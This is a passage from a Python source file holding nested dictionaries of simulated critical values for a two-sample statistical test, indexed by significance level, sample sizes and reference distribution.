0.09169859151319848, 'nor': 0.19139039112626904, 'beta1': 0.08930844976492569, 'beta2': 0.13136678111208, 'beta4': 0.054792012779084076}, 150: {'uni': 0.09812163743144275, 'nor': 0.19750433547881496, 'beta1': 0.09057788640231174, 'beta2': 0.13861898534255174, 'beta4': 0.06359560963591554}, 100: {'uni': 0.11008343360793232, 'nor': 0.20777204018968287, 'beta1': 0.09689906172316676, 'beta2': 0.15021550515080317, 'beta4': 0.07807825052420148}, 75: {'uni': 0.12242653071663401, 'nor': 0.215751343862846, 'beta1': 0.11085258086667488, 'beta2': 0.16074658563892358, 'beta4': 0.0909916380632606}, 50: {'uni': 0.1425128725621415, 'nor': 0.23236256807944267, 'beta1': 0.13421822598853264, 'beta2': 0.17967686927808513, 'beta4': 0.11246630487802428}, 30: {'uni': 0.1756938390152408, 'nor': 0.25727221518650933, 'beta1': 0.17068207541412989, 'beta2': 0.2079075053657387, 'beta4': 0.1469866126893361}, 20: {'uni': 0.21140412281823978, 'nor': 0.28677376608134897, 'beta1': 0.20711509883306756, 'beta2': 0.2384287148752032, 'beta4': 0.18262460986524906}, 10: {'uni': 0.28890701868848456, 'nor': 0.3541341956391229, 'beta1': 0.28845583251972085, 'beta2': 0.3104258261391907, 'beta4': 0.2639310068340357}}}} # noqa: E501, E231 crit_val_upd_cm = {0.05: {1000: {1000: {'uni': 0.45559810479972657, 'nor': 0.8517883181720683, 'beta1': 0.46148158376018295, 'beta2': 2.5871697557890188, 'beta4': 0.31747502464750654}, 750: {'uni': 0.46139038881877054, 'nor': 0.7435903262011547, 'beta1': 0.45311472469817826, 'beta2': 1.9077935301454356, 'beta4': 0.32427601703371456}, 500: {'uni': 0.46902770162756147, 'nor': 0.6520675952105567, 'beta1': 0.4585639552609696, 'beta2': 1.3749405307284122, 'beta4': 0.3505515605224531}, 400: {'uni': 0.46369685433009517, 'nor': 0.6086007217455988, 'beta1': 0.46599917293822524, 'beta2': 1.179045003751046, 'beta4': 0.3729228914045017}, 300: {'uni': 0.4644552857669589, 'nor': 0.5653154717862657, 'beta1': 0.46300936268982834, 'beta2': 0.9776044208448484, 'beta4': 0.38982619311615263}, 200: {'uni': 0.4571278925321188, 'nor': 0.5334620435688897, 'beta1': 0.45769696165515195, 'beta2': 0.783196788788819, 'beta4': 0.4111185009994434}, 150: {'uni': 0.4501014461173613, 'nor': 0.5235082860405369, 'beta1': 0.4554205617411987, 'beta2': 0.7050034087974801, 'beta4': 0.4169551450168423}, 100: {'uni': 0.4640563713024824, 'nor': 0.5088639605300145, 'beta1': 0.4526189404673693, 'beta2': 0.6166857601686297, 'beta4': 0.4284294881310813}, 75: {'uni': 0.46172983920615474, 'nor': 0.48326130937595263, 'beta1': 0.46557677737339276, 'beta2': 0.5663728109579013, 'beta4': 0.43479865707945214}, 50: {'uni': 0.45384779467384323, 'nor': 0.4744302526175002, 'beta1': 0.4578899375202278, 'beta2': 0.5360352336411138, 'beta4': 0.4483607871304931}, 30: {'uni': 0.4582035780536769, 'nor': 0.4625643124126838, 'beta1': 0.46174031673574345, 'beta2': 0.4992136649412738, 'beta4': 0.45735799800719645}, 20: {'uni': 0.4526152214826935, 'nor': 0.4700366710058157, 'beta1': 0.45825521668523833, 'beta2': 0.48288733318211274, 'beta4': 0.4513037697878831}, 10: {'uni': 0.4557565864779044, 'nor': 0.4605305109093896, 'beta1': 0.45008522280936103, 'beta2': 0.456650225645871, 'beta4': 0.4473779014384035}}, 750: {1000: {'uni': 0.4671101385676527, 'nor': 0.9530664085923595, 'beta1': 0.47021996721580633, 'beta2': 2.576076443647349, 'beta4': 0.28735513040023863}, 750: {'uni': 0.46549469608311234, 'nor': 0.8304507565146779, 'beta1': 0.46247720908266216, 'beta2': 1.9297411734235133, 'beta4': 0.3175400030818115}, 500: {'uni': 0.45031971859128733, 'nor': 0.7037121636426986, 'beta1': 0.4561887749034241, 'beta2': 1.3861924601141589, 'beta4': 0.33932522495776996}, 400: {'uni': 0.45910749033925163, 'nor': 0.6584547024212655, 'beta1': 0.46280894836812647, 'beta2': 1.177901179686585, 'beta4': 0.36205890600857127}, 300: {'uni': 0.4598996192822354, 'nor': 0.5932997635796144, 'beta1': 0.4566144871979255, 'beta2': 1.003307298985205, 'beta4': 0.37620893309626435}, 200: {'uni': 0.4687450522736763, 'nor': 0.5535329672062865, 'beta1': 0.45546423259991065, 'beta2': 0.8003681825795168, 'beta4': 0.39545533013427847}, 150: {'uni': 0.4615068053273442, 'nor': 0.5337201883098839, 'beta1': 0.4658827349939095, 'beta2': 0.7194878279530482, 'beta4': 0.39930675083159844}, 100: {'uni': 0.45294161352762236, 'nor': 0.49934234578623937, 'beta1': 0.45939987939480864, 'beta2': 0.6271644471759874, 'beta4': 0.42228996859829304}, 75: {'uni': 0.46396194890875886, 'nor': 0.4991938436100394, 'beta1': 0.4516637122972515, 'beta2': 0.600183976681279, 'beta4': 0.4315787240897153}, 50: {'uni': 0.4558134596093263, 'nor': 0.48532012355575227, 'beta1': 0.46668813480110743, 'beta2': 0.5516090319210735, 'beta4': 0.4403510493137504}, 30: {'uni': 0.4532337683620265, 'nor': 0.47431141524632014, 'beta1': 0.45894951442019266, 'beta2': 0.5127086350573624, 'beta4': 0.4538090248861624}, 20: {'uni': 0.45706656231424797, 'nor': 0.4683828099157367, 'beta1': 0.4578578291661163, 'beta2': 0.48619566535923797, 'beta4': 0.45265523176626016}, 10: {'uni': 0.4547063269767834, 'nor': 0.4642234490355344, 'beta1': 0.458910199349091, 'beta2': 0.47790940842399, 'beta4': 0.44187531689045434}}, 500: {1000: {'uni': 0.46431028072910796, 'nor': 1.2234668429214117, 'beta1': 0.4663409164283998, 'beta2': 2.909984174283791, 'beta4': 0.2638984835623977}, 750: {'uni': 0.4527296267722845, 'nor': 1.0129802673096442, 'beta1': 0.4661915241033681, 'beta2': 2.234543975122914, 'beta4': 0.28640752516522716}, 500: {'uni': 0.44920975339976527, 'nor': 0.8384973662337322, 'beta1': 0.4659177279610012, 'beta2': 1.6573851889124338, 'beta4': 0.3100483149128471}, 400: {'uni': 0.4604675769306956, 'nor': 0.7579069321331191, 'beta1': 0.4597499831992274, 'beta2': 1.375925316264524, 'beta4': 0.3271543663337684}, 300: {'uni': 0.46331646241562313, 'nor': 0.6860309707578209, 'beta1': 0.45672744909248153, 'beta2': 1.1455923805506387, 'beta4': 0.35199679848261545}, 200: {'uni': 0.46098791431035313, 'nor': 0.6110936233160561, 'beta1': 0.45623909036855964, 'beta2': 0.9023873311329137, 'beta4': 0.3740712067833442}, 150: {'uni': 0.46468019323747944, 'nor': 0.5726647439154294, 'beta1': 0.4579527283181098, 'beta2': 0.8137349608860205, 'beta4': 0.38660489715338325}, 100: {'uni': 0.44280947247057195, 'nor': 0.541212184044558, 'beta1': 0.4586912165344261, 'beta2': 0.6802911262157844, 'beta4': 0.40623099849768124}, 75: {'uni': 0.46067109767294057, 'nor': 0.5060241328725488, 'beta1': 0.4491456775696246, 'beta2': 0.6232000035126825, 'beta4': 0.41007335800405376}, 50: {'uni': 0.4642733769081602, 'nor': 0.4977233114944672, 'beta1': 0.4626897423482415, 'beta2': 0.5705187474225152, 'beta4': 0.43059164051626647}, 30: {'uni': 0.4634043308646643, 'nor': 0.47331431231053034, 'beta1': 0.4554845714502249, 'beta2': 0.5139451555702169, 'beta4': 0.4409000510846484}, 20: {'uni': 0.45447992295448086, 'nor': 0.46678900243826393, 'beta1': 0.4626946837181949, 'beta2': 0.4930376191474854, 'beta4': 0.44935770151688587}, 10: {'uni': 0.45968160397151125, 'nor': 0.45690145976659674, 'beta1': 0.4566821472035449, 'beta2': 0.47419588710664023, 'beta4': 0.4454396591179534}}, 400: {1000: {'uni': 0.46334746314235276, 'nor': 1.4212390782587057, 'beta1': 0.46432389571147187, 'beta2': 2.9511199986889567, 'beta4': 0.2548616038247043}, 750: {'uni': 0.46250149072434, 'nor': 1.1572837205061097, 'beta1': 0.45295311454161974, 'beta2': 2.2440218041300914, 'beta4': 0.2710536211963412}, 500: {'uni': 0.45875549934793214, 'nor': 0.9122844809960323, 'beta1': 0.46801707119646535, 'beta2': 1.6311861640718006, 'beta4': 0.299393562783303}, 400: {'uni': 0.45999191565658354, 'nor': 0.8321847654729663, 'beta1': 0.4543498505221871, 'beta2': 1.3834076695036321, 'beta4': 0.3147187867784898}, 300: {'uni': 0.4554315877101111, 'nor': 0.7443688240945351, 'beta1': 0.45801052563798017, 'beta2': 1.1684865218336506, 'beta4': 0.33644119882532764}, 200: {'uni': 0.45178274951742387, 'nor': 0.6453749303312785, 'beta1': 0.4622690847109136, 'beta2': 0.9539305765063816, 'beta4': 0.36638705949582}, 150: {'uni': 0.46095703347012823, 'nor': 0.5920587225254844, 'beta1': 0.46154296100068704, 'beta2': 0.8211590220880783, 'beta4': 0.3773287000190313}, 100: {'uni': 0.4544996973676238, 'nor': 0.5571569000218716, 'beta1': 0.453375970925131, 'beta2': 0.692973824446134, 'beta4': 0.39552439235261067}, 75: {'uni': 0.4557987009033754, 'nor': 0.5310033434466808, 'beta1': 0.46394857322795036, 'beta2': 0.6395425030032836, 'beta4': 0.41383415561423936}, 50: {'uni': 0.4596200061931766, 'nor': 0.5035061103314598, 'beta1': 0.46157446299514704, 'beta2': 0.5707639621760862, 'beta4': 0.4274547334895614}, 30: {'uni': 0.4622195415634097, 'nor': 0.481847432681625, 'beta1': 0.45645686175488404, 'beta2': 0.5282215919286881, 'beta4': 0.44942696536191723}, 20: {'uni': 0.4601535149631279, 'nor': 0.46786286516371267, 'beta1': 0.4584807741864064, 'beta2': 0.5048557967951252, 'beta4': 0.4467008433551776}, 10: {'uni': 0.4566656610912351, 'nor': 0.4608766556204386, 'beta1': 0.45972096388599104, 'beta2': 0.46187183414597643, 'beta4': 0.44529944495174606}}, 300: {1000: {'uni': 0.4678306072779978, 'nor': 1.6846576613370994, 'beta1': 0.455141320355163, 'beta2': 3.2769979281996946, 'beta4': 0.24362518318852816}, 750: {'uni': 0.4639283758788118, 'nor': 1.3692288724675523, 'beta1': 0.4519930460350413, 'beta2': 2.48255224192705, 'beta4': 0.257787980956284}, 500: {'uni': 0.4615433540741257, 'nor': 1.0781678636207295, 'beta1': 0.4568829378747058, 'beta2': 1.7874941485381564, 'beta4': 0.2784868409512676}, 400: {'uni': 0.46314421492499913, 'nor': 0.945656701408267, 'beta1': 0.45638148747157714, 'beta2': 1.5553160126544203, 'beta4': 0.29442225358951485}, 300: {'uni': 0.45802925961617075, 'nor': 0.815185178839487, 'beta1': 0.4728376878704712, 'beta2': 1.3189271036216643, 'beta4': 0.31282000690847095}, 200: {'uni': 0.45552503014694784, 'nor': 0.7126513035155815, 'beta1': 0.457748166276982, 'beta2': 1.0244415040388415, 'beta4': 0.33638426993603954}, 150: {'uni': 0.45977438272674637, 'nor': 0.6476380215438066, 'beta1': 0.46088490835938306, 'beta2': 0.883431113717793, 'beta4': 0.3612048298573282}, 100: {'uni': 0.4577251815882555, 'nor': 0.5847497979075034, 'beta1': 0.4607222654294412, 'beta2': 0.7408620962926734, 'beta4': 0.388104481277193}, 75: {'uni': 0.4518072467213142, 'nor': 0.5473729546010359, 'beta1': 0.4627254896168214, 'beta2': 0.6718156449469996, 'beta4': 0.39949639520710356}, 50: {'uni': 0.4624340988295268, 'nor': 0.5070678067559616, 'beta1': 0.4600742937716636, 'beta2': 0.5877011320882554, 'beta4': 0.41897175228123534}, 30: {'uni': 0.4471319926020618, 'nor': 0.49800426129809117, 'beta1': 0.46166731503603964, 'beta2': 0.5382082617448081, 'beta4': 0.4269532461240621}, 20: {'uni': 0.4507897993107089, 'nor': 0.4883236654625753, 'beta1': 0.45173581672090074, 'beta2': 0.5137279220044103, 'beta4': 0.429523416507684}, 10: {'uni': 0.45073558507341144, 'nor': 0.46918804329372793, 'beta1': 0.4451935416099544, 'beta2': 0.4852511163613957, 'beta4': 0.44714304152144957}}, 200: {1000: {'uni': 0.45885173358196935, 'nor': 2.313702128659912, 'beta1': 0.46628907909788697, 'beta2': 3.919691106665795, 'beta4': 0.22577462466197668}, 750: {'uni': 0.46486920384123687, 'nor': 1.894257654666399, 'beta1': 0.4583262434977319, 'beta2': 2.996917703241686, 'beta4': 0.2365414295750558}, 500: {'uni': 0.4655614734441917, 'nor': 1.4121255947025406, 'beta1': 0.46139377072341475, 'beta2': 2.1388747442025053, 'beta4': 0.25571742276292764}, 400: {'uni': 0.45979504899083645, 'nor': 1.1959447863019266, 'beta1': 0.4633743884393436, 'beta2': 1.8945633202659455, 'beta4': 0.26174739678990866}, 300: {'uni': 0.46151970036157763, 'nor': 0.9990455243111591, 'beta1': 0.45625628150868885, 'beta2': 1.5323939095799728, 'beta4': 0.2797029660784162}, 200: {'uni': 0.46329361026808363, 'nor': 0.8279186395972875, 'beta1': 0.4601804288648336, 'beta2': 1.1681140647178716, 'beta4': 0.30982583667555}, 150: {'uni': 0.4572822684346562, 'nor': 0.7479149303285376, 'beta1': 0.4594933621823919, 'beta2': 0.9966989126230038, 'beta4': 0.33461124037426687}, 100: {'uni': 0.45394668972915964, 'nor': 0.6398062870023858, 'beta1': 0.4627344243428069, 'beta2': 0.8176636065711426, 'beta4': 0.3599502235499713}, 75: {'uni': 0.46314929132601923, 'nor': 0.5942511767606652, 'beta1': 0.462554701559842, 'beta2': 0.726258500681477, 'beta4': 0.37828723280018234}, 50: {'uni': 0.4556089575922582, 'nor': 0.5488603313292467, 'beta1': 0.4598695592482842, 'beta2': 0.6441882415918142, 'beta4': 0.3957454832976954}, 30: {'uni': 0.45773418553147505, 'nor': 0.5205925655922161, 'beta1': 0.45894106285346375, 'beta2': 0.569590768144685, 'beta4': 0.4160624036343173}, 20: {'uni': 0.46253502192456564, 'nor': 0.4949851926492912, 'beta1': 0.462302879698588, 'beta2': 0.5144720515689009, 'beta4': 0.4386929562520044}, 10: {'uni': 0.4585444998193927, 'nor': 0.46913451515184496, 'beta1': 0.4450396687432986, 'beta2': 0.4801828396960754, 'beta4': 0.4417697576556915}}, 150: {1000: {'uni': 0.4686739363709819, 'nor': 3.0262824022146155, 'beta1': 0.46075378959802543, 'beta2': 4.496772517732899, 'beta4': 0.21956864156299188}, 750: {'uni': 0.4730757712115682, 'nor': 2.2878474628402823, 'beta1': 0.4641952013648905, 'beta2': 3.454226350268236, 'beta4': 0.22513983749519534}, 500: {'uni': 0.467323739972249, 'nor': 1.6752768321041132, 'beta1': 0.4734160827536498, 'beta2': 2.5583449698042604, 'beta4': 0.24163315664882407}, 400: {'uni': 0.467181361388595, 'nor': 1.4717110841963421, 'beta1': 0.45676945943433245, 'beta2': 2.2003419598014085, 'beta4': 0.25499403072675786}, 300: {'uni': 0.45817365599621135, 'nor': 1.2144884739248925, 'beta1': 0.45423292829145157, 'beta2': 1.6795832143167255, 'beta4': 0.26984851882435923}, 200: {'uni': 0.46031214602007703, 'nor': 0.9544823344865221, 'beta1': 0.45827471295224265, 'beta2': 1.3068555477711477, 'beta4': 0.2956335766326793}, 150: {'uni': 0.46250179659059476, 'nor': 0.8307292323075929, 'beta1': 0.47030699679154425, 'beta2': 1.0824444708192549, 'beta4': 0.3116662669384352}, 100: {'uni': 0.47437294155670234, 'nor': 0.698032260670409, 'beta1': 0.46050428122512643, 'beta2': 0.8771177581058969, 'beta4': 0.3478432220883441}, 75: {'uni': 0.46101568928238096, 'nor': 0.6391901872213495, 'beta1': 0.45808838518118866, 'beta2': 0.7703520551683095, 'beta4': 0.35717525548395185}, 50: {'uni': 0.46462622526658554, 'nor': 0.5996395671389139, 'beta1': 0.454405885743777, 'beta2': 0.6701476805830073, 'beta4': 0.383110957598389}, 30: {'uni': 0.4549742139788515, 'nor': 0.5227227637941175, 'beta1': 0.4526654552204387, 'beta2': 0.5842761326082846, 'beta4': 0.4060905864194273}, 20: {'uni': 0.45533149660388467, 'nor': 0.5056742867344781, 'beta1': 0.46385670689315067, 'beta2': 0.5371663970405931, 'beta4': 0.4217230902196201}, 10: {'uni': 0.4535641773609069, 'nor': 0.48426462527854375, 'beta1': 0.4605937364242689, 'beta2': 0.4901859387468606, 'beta4': 0.43806641766772514}}, 100: {1000: {'uni': 0.48930491522355274, 'nor': 4.231794279078222, 'beta1': 0.4648268159128582, 'beta2': 5.076033920994245, 'beta4': 0.2123190473857698}, 750: {'uni': 0.47066230425528277, 'nor': 3.3241758532972563, 'beta1': 0.4613337407126484, 'beta2': 4.110911007916439, 'beta4': 0.21746590521356995}, 500: {'uni': 0.4704192169450034, 'nor': 2.3153245303624077, 'beta1': 0.4565432447792894, 'beta2': 2.8234958993051213, 'beta4': 0.22605852382886565}, 400: {'uni': 0.465838791251487, 'nor': 1.9527095270766885, 'beta1': 0.4566450098243281, 'beta2': 2.4468007928214504, 'beta4': 0.23721322735781392}, 300: {'uni': 0.46411098088520025, 'nor': 1.561014800073201, 'beta1': 0.4632108284525748, 'beta2': 1.8642831244346392, 'beta4': 0.24835753772698207}, 200: {'uni': 0.45174147277551824, 'nor': 1.2023498240705341, 'beta1': 0.46011541007923223, 'beta2': 1.4533092999265533, 'beta4': 0.2695895257232507}, 150: {'uni': 0.45512101910714126, 'nor': 1.0227861444988746, 'beta1': 0.45629355382831654, 'beta2': 1.2101007363962848, 'beta4': 0.2826402129948454}, 100: {'uni': 0.44895422601988727, 'nor': 0.8281829651173791, 'beta1': 0.4599492148727822, 'beta2': 0.9522402297514921, 'beta4': 0.3100819029507226}, 75: {'uni': 0.4624546094616787, 'nor': 0.7391357154698432, 'beta1': 0.4454256867486279, 'beta2': 0.8380807783471576, 'beta4': 0.3350546905751392}, 50: {'uni': 0.4582123043671451, 'nor': 0.6436142214253436, 'beta1': 0.45290471826329226, 'beta2': 0.6884686777502067, 'beta4': 0.3535200461220699}, 30: {'uni': 0.45027154229719185, 'nor': 0.5713935637999112, 'beta1': 0.4573479450749157, 'beta2': 0.6015939522027731, 'beta4': 0.3839413198651744}, 20: {'uni': 0.45171743897365974, 'nor': 0.5347497445539434, 'beta1': 0.46211432961160004, 'beta2': 0.5451510328036631, 'beta4': 0.40451931108916456}, 10: {'uni': 0.44070319928906704, 'nor': 0.4936671748919524, 'beta1': 0.4541059781166824, 'beta2': 0.49464729872647506, 'beta4': 0.4318904485577639}}, 75: {1000: {'uni': 0.5003977481745122, 'nor': 5.462091297206367, 'beta1': 0.4680613054845644, 'beta2': 5.924127662942348, 'beta4': 0.20689611333819638}, 750: {'uni': 0.4863213870019091, 'nor': 4.195407788335534, 'beta1': 0.45921461198551916, 'beta2': 4.565196319176767, 'beta4': 0.2117710761786967}, 500: {'uni': 0.48206260654769756, 'nor': 3.009404705689477, 'beta1': 0.4594797526137332, 'beta2': 3.2296753596700754, 'beta4': 0.219205809113329}, 400: {'uni': 0.48282191154017823, 'nor': 2.463683631414553, 'beta1': 0.45092972241618584, 'beta2': 2.6765713933408413, 'beta4': 0.2251887548381428}, 300: {'uni': 0.47174966823511777, 'nor': 1.9615869965631514, 'beta1': 0.4583462725670028, 'beta2': 2.1532255364843853, 'beta4': 0.23397868721020146}, 200: {'uni': 0.4626689744300011, 'nor': 1.4641327983886003, 'beta1': 0.4658991503050986, 'beta2': 1.5737286518460933, 'beta4': 0.25104192403440617}, 150: {'uni': 0.4657367060782218, 'nor': 1.2246992402511192, 'beta1': 0.4608643825770374, 'beta2': 1.298200837285324, 'beta4': 0.2657567009143168}, 100: {'uni': 0.4680974024125245, 'nor': 0.9869302426794837, 'beta1': 0.45671102797869095, 'beta2': 1.0239621521249562, 'beta4': 0.28860697938441604}, 75: {'uni': 0.45721900242950014, 'nor': 0.8394457650917727, 'beta1': 0.45257963102668763, 'beta2': 0.8762211832314769, 'beta4': 0.30828992116505344}, 50: {'uni': 0.46221923910596263, 'nor': 0.7025130572021119, 'beta1': 0.4663920405352124, 'beta2': 0.7320291693929537, 'beta4': 0.3374203378918949}, 30: {'uni': 0.46162653508754836, 'nor': 0.5945057627400746, 'beta1': 0.460262757481406, 'beta2': 0.6125308748955279, 'beta4': 0.37175415079144314}, 20: {'uni': 0.4484831394973252, 'nor': 0.5549838564035073, 'beta1': 0.4465222643970824, 'beta2': 0.5731591544178343, 'beta4': 0.3955814404310021}, 10: {'uni': 0.4476154281433029, 'nor': 0.5084002647840371, 'beta1': 0.44746085678431474, 'beta2': 0.5057333922587223, 'beta4': 0.41560141836545733}}, 50: {1000: {'uni': 0.5663296978660596, 'nor': 7.983963066009825, 'beta1': 0.46814721453633024, 'beta2': 7.492537638667248, 'beta4': 0.20220788976247608}, 750: {'uni': 0.534971516073435, 'nor': 6.083186838398358, 'beta1': 0.46772071939621757, 'beta2': 5.857165814312657, 'beta4': 0.2087106159241854}, 500: {'uni': 0.5110652229849488, 'nor': 4.245763354477031, 'beta1': 0.4635245488014993, 'beta2': 4.006367236866797, 'beta4': 0.2125436775661207}, 400: {'uni': 0.49656540793595844, 'nor': 3.4903307593763615, 'beta1': 0.4596191698570935, 'beta2': 3.220472312730357, 'beta4': 0.21522710874813766}, 300: {'uni': 0.48325484856882694, 'nor': 2.7439875309400663, 'beta1': 0.46979584833424004, 'beta2': 2.454009618094874, 'beta4': 0.22202183552173416}, 200: {'uni': 0.4749008479770199, 'nor': 1.9911920792861806, 'beta1': 0.4646514964240773, 'beta2': 1.8398693746548478, 'beta4': 0.23132822063479933}, 150: {'uni': 0.45992992076859157, 'nor': 1.5868134499191664, 'beta1': 0.4643633359446529, 'beta2': 1.5244070878488096, 'beta4': 0.241921281044518}, 100: {'uni': 0.4595325614734308, 'nor': 1.1877615726990094, 'beta1': 0.4556650201969106, 'beta2': 1.1488237785978777, 'beta4': 0.26302607932992944}, 75: {'uni': 0.4520277530528519, 'nor': 1.0399301654084963, 'beta1': 0.45349015551351834, 'beta2': 0.9621553030458346, 'beta4': 0.2888083942150036}, 50: {'uni': 0.44992890748902026, 'nor': 0.8404661942325818, 'beta1': 0.45869080459514733, 'beta2': 0.8067902763450495, 'beta4': 0.30944414708340734}, 30: {'uni': 0.45607719675530556, 'nor': 0.6802063225745539, 'beta1': 0.44960843024574637, 'beta2': 0.6511496131049556, 'beta4': 0.34852267592227426}, 20: {'uni': 0.4475451587223669, 'nor': 0.5993508489607557, 'beta1': 0.4465931941437228, 'beta2': 0.596548736443132, 'beta4': 0.37438540421392114}, 10: {'uni': 0.44988236069403104, 'nor': 0.5247871497390096, 'beta1': 0.45464843165719043, 'beta2': 0.50412851889225, 'beta4': 0.4041010172891987}}, 30: {1000: {'uni': 0.7387233486988768, 'nor': 13.088402113564948, 'beta1': 0.47865647929539973, 'beta2': 9.912717867631558, 'beta4': 0.19858219196297577}, 750: {'uni': 0.6716005073702885, 'nor': 9.898721221592352, 'beta1': 0.46649443507443217, 'beta2': 7.416096292643614, 'beta4': 0.20003363414287242}, 500: {'uni': 0.5992179294036338, 'nor': 6.920710947011493, 'beta1': 0.46975583075586863, 'beta2': 4.964800683896901, 'beta4': 0.20435420309200666}, 400: {'uni': 0.5561270269868971, 'nor': 5.66798011970821, 'beta1': 0.4717982184500732, 'beta2': 4.106537093753369, 'beta4': 0.20691331385704004}, 300: {'uni': 0.5368877356646864, 'nor': 4.2779346835887555, 'beta1': 0.4652230282555292, 'beta2': 3.1241120043999575, 'beta4': 0.21011463481669218}, 200: {'uni': 0.4987013286374435, 'nor': 2.959741272830969, 'beta1': 0.46381906690045765, 'beta2': 2.2157230067479814, 'beta4': 0.21729932835609236}, 150: {'uni': 0.49840708861118943, 'nor': 2.352823733206511, 'beta1': 0.45640297863082435, 'beta2': 1.779992721937523, 'beta4': 0.22700584318850683}, 100: {'uni': 0.471756061765789, 'nor': 1.7431236435657966, 'beta1': 0.45530265822942073, 'beta2': 1.337831703717496, 'beta4': 0.23974268049710493}, 75: {'uni': 0.4649466295886003, 'nor': 1.4126507700625057, 'beta1': 0.4580500700771751, 'beta2': 1.128839322838012, 'beta4': 0.251645105883213}, 50: {'uni': 0.4535321638232544, 'nor': 1.0828805050102166, 'beta1': 0.4538612144716673, 'beta2': 0.8944487312764252, 'beta4': 0.2772114320140775}, 30: {'uni': 0.4548389075174882, 'nor': 0.8377037159832129, 'beta1': 0.4519596464989444, 'beta2': 0.7094375595815571, 'beta4': 0.310244459466603}, 20: {'uni': 0.4451068851924446, 'nor': 0.7339007690903065, 'beta1': 0.4451277942845969, 'beta2': 0.6008918124507844, 'beta4': 0.338998587660669}, 10: {'uni': 0.45353927033858477, 'nor': 0.5782028388164439, 'beta1': 0.4584685620829519, 'beta2': 0.531376107648766, 'beta4': 0.38352415993817385}}, 20: {1000: {'uni': 1.0894922478649511, 'nor': 20.003094666486263, 'beta1': 0.5181844718184673, 'beta2': 12.13321215700854, 'beta4': 0.1962693415263007}, 750: {'uni': 0.9184009700423779, 'nor': 15.013754159330176, 'beta1': 0.5021945895537219, 'beta2': 9.162381456103228, 'beta4': 0.19629774346862977}, 500: {'uni': 0.7588954962445985, 'nor': 10.055656119144814, 'beta1': 0.4922340597004922, 'beta2': 6.123698563556234, 'beta4': 0.20025199202983998}, 400: {'uni': 0.6997818044235432, 'nor': 8.209642023001999, 'beta1': 0.4816402192212816, 'beta2': 5.1244484441005325, 'beta4': 0.20180721973367308}, 300: {'uni': 0.6305296664843701, 'nor': 6.273332564653617, 'beta1': 0.4783208741435825, 'beta2': 3.8922181031413277, 'beta4': 0.20515722848399004}, 200: {'uni': 0.5656028930795196, 'nor': 4.372928002486701, 'beta1': 0.475973934426061, 'beta2': 2.677360291305044, 'beta4': 0.2100432666640936}, 150: {'uni': 0.5349220822574644, 'nor': 3.3411354111522917, 'beta1': 0.47500519582521517, 'beta2': 2.137164523272219, 'beta4': 0.214232307355653}, 100: {'uni': 0.5045468518311341, 'nor': 2.4340920510874984, 'beta1': 0.45888547757876796, 'beta2': 1.588903919680189, 'beta4': 0.2246944373092718}, 75: {'uni': 0.48771323589584, 'nor': 1.9342381299397664, 'beta1': 0.459726728581532, 'beta2': 1.286504131157538, 'beta4': 0.23430910656002463}, 50: {'uni': 0.4644642299419138, 'nor': 1.4514552833852477, 'beta1': 0.45454814751513606, 'beta2': 0.9699335230442881, 'beta4': 0.24784781696012298}, 30: {'uni': 0.4630355897784532, 'nor': 1.0525485187071442, 'beta1': 0.44890325734490744, 'beta2': 0.7612572461007282, 'beta4': 0.27771911847861674}, 20: {'uni': 0.44436687230622546, 'nor': 0.8395516873431574, 'beta1': 0.45817604259495165, 'beta2': 0.6608362126367603, 'beta4': 0.31123542244036}, 10: {'uni': 0.4361704051076968, 'nor': 0.6572725764375509, 'beta1': 0.4413867755624091, 'beta2': 0.549693246598183, 'beta4': 0.35789683180043264}}, 10: {1000: {'uni': 2.71866569395543, 'nor': 40.3607988416683, 'beta1': 1.045723953486904, 'beta2': 18.264584863269278, 'beta4': 0.19340346551484838}, 750: {'uni': 2.135095878109219, 'nor': 31.335751870550318, 'beta1': 0.8686608835871902, 'beta2': 13.837281382290511, 'beta4': 0.19674409440753848}, 500: {'uni': 1.561435372670413, 'nor': 20.847843925502136, 'beta1': 0.7026497048494321, 'beta2': 9.127638494088687, 'beta4': 0.19914538106246596}, 400: {'uni': 1.3464692788145056, 'nor': 16.675073125445905, 'beta1': 0.6560756046842351, 'beta2': 7.406779998790831, 'beta4': 0.1981648542595328}, 300: {'uni': 1.0884293558360072, 'nor': 12.372459331870136, 'beta1': 0.5877835264042439, 'beta2': 5.737333836923571, 'beta4': 0.20237617530927202}, 200: {'uni': 0.8631494900499794, 'nor': 8.300996637013071, 'beta1': 0.5248229438161377, 'beta2': 3.872762504402488, 'beta4': 0.2046459202157461}, 150: {'uni': 0.746249692807121, 'nor': 6.406640972978801, 'beta1': 0.5064527635631025, 'beta2': 2.971093545391119, 'beta4': 0.20257999588678052}, 100: {'uni': 0.6390360884623073, 'nor': 4.453947014982036, 'beta1': 0.4776849499506595, 'beta2': 2.111102696976735, 'beta4': 0.20637930623052075}, 75: {'uni': 0.5746789450804921, 'nor': 3.5964267643202255, 'beta1': 0.4853289552525349, 'beta2': 1.6426532163723997, 'beta4': 0.21022302629863826}, 50: {'uni': 0.5211310313766764, 'nor': 2.4917181735328917, 'beta1': 0.4700618462509633, 'beta2': 1.267274957963436, 'beta4': 0.2211410893248344}, 30: {'uni': 0.47804153947804207, 'nor': 1.6848055477508295, 'beta1': 0.44501316015962583, 'beta2': 0.891831606576434, 'beta4': 0.2400552361609186}, 20: {'uni': 0.4465223369536981, 'nor': 1.2624618308322546, 'beta1': 0.4422988766841338, 'beta2': 0.7196688797683929, 'beta4': 0.2604904005752692}, 10: {'uni': 0.4277837129953045, 'nor': 0.8471825992836655, 'beta1': 0.43299513108162596, 'beta2': 0.562251485700406, 'beta4': 0.30584932166436574}}}, 0.001: {1000: {1000: {'uni': 1.1936263539323357, 'nor': 2.1918383833877755, 'beta1': 1.1678025072294473, 'beta2': 6.774662646818605, 'beta4': 0.7926506036514294}, 750: {'uni': 1.1351909160899902, 'nor': 1.8986037036959484, 'beta1': 1.1407378263405077, 'beta2': 5.223023039944906, 'beta4': 0.8307779101630771}, 500: {'uni': 1.22774302421359, 'nor': 1.6238844893077675, 'beta1': 1.0804763693096529, 'beta2': 3.804599441299924, 'beta4': 0.8466317806886051}, 400: {'uni': 1.1307350302833419, 'nor': 1.5796751405899492, 'beta1': 1.2064530025809463, 'beta2': 3.3883927721160263, 'beta4': 0.9150569778427471}, 300: {'uni': 1.187305392407893, 'nor': 1.4695856313641065, 'beta1': 1.1535037606458525, 'beta2': 2.772300171422454, 'beta4': 0.8964266997411909}, 200: {'uni': 1.234831043093464, 'nor': 1.3415371409825303, 'beta1': 1.1787142641718298, 'beta2': 2.275931929701913, 'beta4': 1.00370282765997}, 150: {'uni': 1.1996709647495003, 'nor': 1.2937035420290128, 